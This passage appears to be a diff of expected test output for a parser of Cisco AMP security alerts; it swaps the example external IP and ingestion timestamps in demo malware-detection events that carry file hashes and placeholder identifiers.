from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}", "code": "1090519084", "kind": "alert", "action": "DFC Threat Detected", @@ -1069,7 +979,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "connector_guid": "test_connector_guid", "related": { 
@@ -1119,7 +1029,7 @@ "935c1861df1f4018d698e8b65abfa02d7e9037d8f68ca3c2065b6ca165d44ad2" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -1129,8 +1039,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:14:16.070147485Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":1476910664322001000,\"timestamp\":1610706778,\"timestamp_nanoseconds\":322000000,\"date\":\"2021-01-15T10:32:58+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610706778,\"start_date\":\"2021-01-15T10:32:58+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Command_Line_Arguments_Meterpreter\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"27:85:29:21:67:49\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"A named pipe was created in a manner similar to that used for local privilege escalation through named pipe impersonation. 
Tools such as meterpreter often use this technique to escalate to NT Authority\\\\System.\",\"short_description\":\"W32.PossibleNamedPipeImpersonation.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"file_path\":\"/C:/WINDOWS/system32/cmd.exe\",\"identity\":{\"sha256\":\"935c1861df1f4018d698e8b65abfa02d7e9037d8f68ca3c2065b6ca165d44ad2\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"69d6fff3e0a0c4d77a62b4d71e1e3a8d10d93c46782a1b05f0ec4b8919c384b9\"}}}}}", + "ingested": "2021-12-09T13:35:32.898080600Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":1476910664322001000,\"timestamp\":1610706778,\"timestamp_nanoseconds\":322000000,\"date\":\"2021-01-15T10:32:58+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610706778,\"start_date\":\"2021-01-15T10:32:58+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Command_Line_Arguments_Meterpreter\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"27:85:29:21:67:49\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"A named pipe was created in a manner similar to that used for local privilege escalation through named pipe impersonation. 
Tools such as meterpreter often use this technique to escalate to NT Authority\\\\System.\",\"short_description\":\"W32.PossibleNamedPipeImpersonation.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"file_path\":\"/C:/WINDOWS/system32/cmd.exe\",\"identity\":{\"sha256\":\"935c1861df1f4018d698e8b65abfa02d7e9037d8f68ca3c2065b6ca165d44ad2\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"69d6fff3e0a0c4d77a62b4d71e1e3a8d10d93c46782a1b05f0ec4b8919c384b9\"}}}}}", "code": "1107296274", "kind": "alert", "start": "2021-01-15T10:32:58.000Z", @@ -1151,7 +1061,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -1208,7 +1118,7 @@ "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -1225,8 +1135,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:16.070149770Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533671385032557000,\"timestamp\":1610706459,\"timestamp_nanoseconds\":25000000,\"date\":\"2021-01-15T10:27:39+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533671385032556606\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "ingested": "2021-12-09T13:35:32.898086900Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533671385032557000,\"timestamp\":1610706459,\"timestamp_nanoseconds\":25000000,\"date\":\"2021-01-15T10:27:39+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533671385032556606\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -1248,7 +1158,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1294,7 +1204,7 @@ "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -1304,8 +1214,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:14:16.070151856Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":1489955900329000200,\"timestamp\":1610706298,\"timestamp_nanoseconds\":329000000,\"date\":\"2021-01-15T10:24:58+00:00\",\"event_type\":\"Multiple Infected Files\",\"event_type_id\":1107296258,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610706298,\"start_date\":\"2021-01-15T10:24:58+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad\"}}}}}", + "ingested": "2021-12-09T13:35:32.898092700Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":1489955900329000200,\"timestamp\":1610706298,\"timestamp_nanoseconds\":329000000,\"date\":\"2021-01-15T10:24:58+00:00\",\"event_type\":\"Multiple Infected Files\",\"event_type_id\":1107296258,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610706298,\"start_date\":\"2021-01-15T10:24:58+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad\"}}}}}", "code": "1107296258", "kind": "alert", "start": "2021-01-15T10:24:58.000Z", @@ -1327,7 +1237,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -1380,7 +1290,7 @@ "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -1397,8 +1307,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:16.070153909Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533670191031648000,\"timestamp\":1610706181,\"timestamp_nanoseconds\":947000000,\"date\":\"2021-01-15T10:23:01+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533670191031648309\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "ingested": "2021-12-09T13:35:32.898098500Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533670191031648000,\"timestamp\":1610706181,\"timestamp_nanoseconds\":947000000,\"date\":\"2021-01-15T10:23:01+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533670191031648309\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -1420,7 +1330,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1470,7 +1380,7 @@ "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -1483,8 +1393,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:16.070155934Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533670191031648000,\"timestamp\":1610706181,\"timestamp_nanoseconds\":926000000,\"date\":\"2021-01-15T10:23:01+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533670191031648308\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "ingested": "2021-12-09T13:35:32.898104400Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533670191031648000,\"timestamp\":1610706181,\"timestamp_nanoseconds\":926000000,\"date\":\"2021-01-15T10:23:01+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533670191031648308\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -1506,7 +1416,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1556,7 +1466,7 @@ "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -1569,8 +1479,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:16.070157953Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533670191031648000,\"timestamp\":1610706181,\"timestamp_nanoseconds\":533000000,\"date\":\"2021-01-15T10:23:01+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533670191031648307\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "ingested": "2021-12-09T13:35:32.898110200Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533670191031648000,\"timestamp\":1610706181,\"timestamp_nanoseconds\":533000000,\"date\":\"2021-01-15T10:23:01+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533670191031648307\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -1592,7 +1502,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1640,7 +1550,7 @@ "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -1650,8 +1560,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:14:16.070160132Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":15212386047828,\"timestamp\":1610706149,\"timestamp_nanoseconds\":0,\"date\":\"2021-01-15T10:22:29+00:00\",\"event_type\":\"Executed malware\",\"event_type_id\":1107296272,\"detection\":\"W32.B1380FD95B-100.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610706149,\"start_date\":\"2021-01-15T10:22:29+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"file:///C%3A/ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124\"}}}}}", + "ingested": "2021-12-09T13:35:32.898116100Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":15212386047828,\"timestamp\":1610706149,\"timestamp_nanoseconds\":0,\"date\":\"2021-01-15T10:22:29+00:00\",\"event_type\":\"Executed malware\",\"event_type_id\":1107296272,\"detection\":\"W32.B1380FD95B-100.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610706149,\"start_date\":\"2021-01-15T10:22:29+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"file:///C%3A/ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124\"}}}}}", "code": "1107296272", "kind": "alert", "start": "2021-01-15T10:22:29.000Z", @@ -1674,7 +1584,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -1727,7 +1637,7 @@ "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -1744,8 +1654,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:16.070162179Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669929038643000,\"timestamp\":1610706120,\"timestamp_nanoseconds\":973000000,\"date\":\"2021-01-15T10:22:00+00:00\",\"event_type\":\"Threat 